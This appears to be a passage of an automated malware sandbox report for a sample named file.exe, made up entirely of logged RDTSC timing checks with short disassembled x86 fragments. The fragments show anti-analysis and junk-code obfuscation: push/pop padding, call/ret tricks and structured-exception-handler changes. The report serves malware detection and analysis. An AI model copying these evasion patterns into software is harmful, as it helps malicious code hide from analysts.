                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C29BA second address: 7C29BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4958 second address: 7C495C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C495C second address: 7C496A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C496A second address: 7C496E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C496E second address: 7C4998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F5ED52EEF83h 0x00000010 jmp 00007F5ED52EEF7Bh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C54A3 second address: 7C54A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C97A6 second address: 7C97AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9907 second address: 7C990B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C990B second address: 7C9916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA940 second address: 7CA944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA944 second address: 7CA94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC8F3 second address: 7CC924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F5ED4EAF47Ah 0x0000000e nop 0x0000000f mov bx, ax 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D18D7h], eax 0x0000001a push 00000000h 0x0000001c xor edi, 058F2320h 0x00000022 xchg eax, esi 0x00000023 je 00007F5ED4EAF48Bh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC924 second address: 7CC93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE97A second address: 7CE987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE987 second address: 7CE99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE99A second address: 7CE99F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE99F second address: 7CEA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5ED52EEF76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5ED52EEF78h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jbe 00007F5ED52EEF78h 0x0000002e mov ebx, esi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 and ebx, dword ptr [ebp+122D3063h] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jmp 00007F5ED52EEF89h 0x00000049 mov dword ptr [ebp+122D18C7h], eax 0x0000004f mov eax, dword ptr [ebp+122D16E5h] 0x00000055 mov di, bx 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007F5ED52EEF78h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 00000014h 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 or ebx, dword ptr [ebp+122D18FCh] 0x0000007a nop 0x0000007b jnl 00007F5ED52EEF93h 0x00000081 jnp 00007F5ED52EEF8Dh 0x00000087 jmp 00007F5ED52EEF87h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f js 00007F5ED52EEF81h 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0923 second address: 7D093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D093B second address: 7D0955 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED52EEF7Ch 0x00000008 jno 00007F5ED52EEF76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jbe 00007F5ED52EEF7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0955 second address: 7D09A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5ED4EAF478h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 stc 0x00000027 push 00000000h 0x00000029 mov edi, 1CB9050Bh 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 jg 00007F5ED4EAF47Ch 0x00000036 pushad 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D09A2 second address: 7D09A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D09A6 second address: 7D09BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF485h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D09BF second address: 7D09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1958 second address: 7D195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A2C second address: 7D3A8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F5ED52EEF78h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 or ebx, 0909379Fh 0x00000029 push 00000000h 0x0000002b jnl 00007F5ED52EEF7Ah 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F5ED52EEF78h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 pop ecx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A8E second address: 7D3ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5ED4EAF476h 0x00000009 jmp 00007F5ED4EAF482h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5ED4EAF47Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3ABD second address: 7D3AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3AC3 second address: 7D3AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5ED4EAF47Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3C33 second address: 7D3C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3C38 second address: 7D3C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5ED4EAF476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3C42 second address: 7D3CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5ED52EEF81h 0x0000000e nop 0x0000000f cld 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F5ED52EEF78h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 add dword ptr [ebp+122D18C1h], eax 0x0000003e mov eax, dword ptr [ebp+122D1231h] 0x00000044 jmp 00007F5ED52EEF83h 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+1245951Fh] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jng 00007F5ED52EEF76h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3CC2 second address: 7D3CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5953 second address: 7D5957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5957 second address: 7D595B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D595B second address: 7D5961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5961 second address: 7D5986 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5ED4EAF48Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5986 second address: 7D598C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B3D second address: 7D4B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D598C second address: 7D5992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B43 second address: 7D4B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5ED4EAF482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6AB2 second address: 7D6AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6D32 second address: 7D6D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6D36 second address: 7D6D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6D3C second address: 7D6D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA1C6 second address: 7DA1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA456 second address: 7DA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11C3 second address: 7E11C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0BBB second address: 7E0BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E297E second address: 7E2986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2986 second address: 7E298B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E298B second address: 7E29A8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5ED52EEF7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F5ED52EEF76h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jng 00007F5ED52EEF76h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E29A8 second address: 7E29B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AD6 second address: 7E7AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AEC second address: 7E7B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F5ED4EAF47Fh 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7BDB second address: 7E7BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7C9E second address: 7E7CA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE195 second address: 7EE19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE19D second address: 7EE1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE1A3 second address: 7EE1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE1A9 second address: 7EE1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1673 second address: 7C1677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED3BC second address: 7ED3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED7CF second address: 7ED7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDB16 second address: 7EDB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF481h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDB2B second address: 7EDB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDB2F second address: 7EDB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDE84 second address: 7EDEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jg 00007F5ED52EEFB3h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5ED52EEF89h 0x00000014 jc 00007F5ED52EEF76h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F70 second address: 7F5F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F76 second address: 7F5F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5ED52EEF7Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C648B second address: 7C6507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5ED4EAF478h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2FC6h], edi 0x0000002d sbb dl, FFFFFFF7h 0x00000030 lea eax, dword ptr [ebp+12488217h] 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F5ED4EAF478h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D2AFFh] 0x00000056 nop 0x00000057 jnl 00007F5ED4EAF483h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6507 second address: 7A49D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F5ED52EEF78h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D3757h], ebx 0x00000028 call dword ptr [ebp+124649EDh] 0x0000002e pushad 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C66DD second address: 7C6704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F5ED4EAF476h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5ED4EAF483h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6704 second address: 7C670A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C699B second address: 7C699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6A8D second address: 7C6A93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6A93 second address: 7C6AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6AA3 second address: 7C6AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6B43 second address: 7C6B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6B5E second address: 7C6B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6B62 second address: 7C6B97 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 07BE0D87h 0x00000012 pushad 0x00000013 mov ebx, dword ptr [ebp+122D3398h] 0x00000019 mov esi, dword ptr [ebp+122D2CF7h] 0x0000001f popad 0x00000020 mov dword ptr [ebp+1245929Ah], eax 0x00000026 push 5F83B518h 0x0000002b push esi 0x0000002c pushad 0x0000002d jnc 00007F5ED4EAF476h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C92 second address: 7C6C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6CF0 second address: 7C6D4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F5ED4EAF488h 0x0000000e jmp 00007F5ED4EAF482h 0x00000013 xchg eax, esi 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F5ED4EAF478h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e stc 0x0000002f nop 0x00000030 jno 00007F5ED4EAF480h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
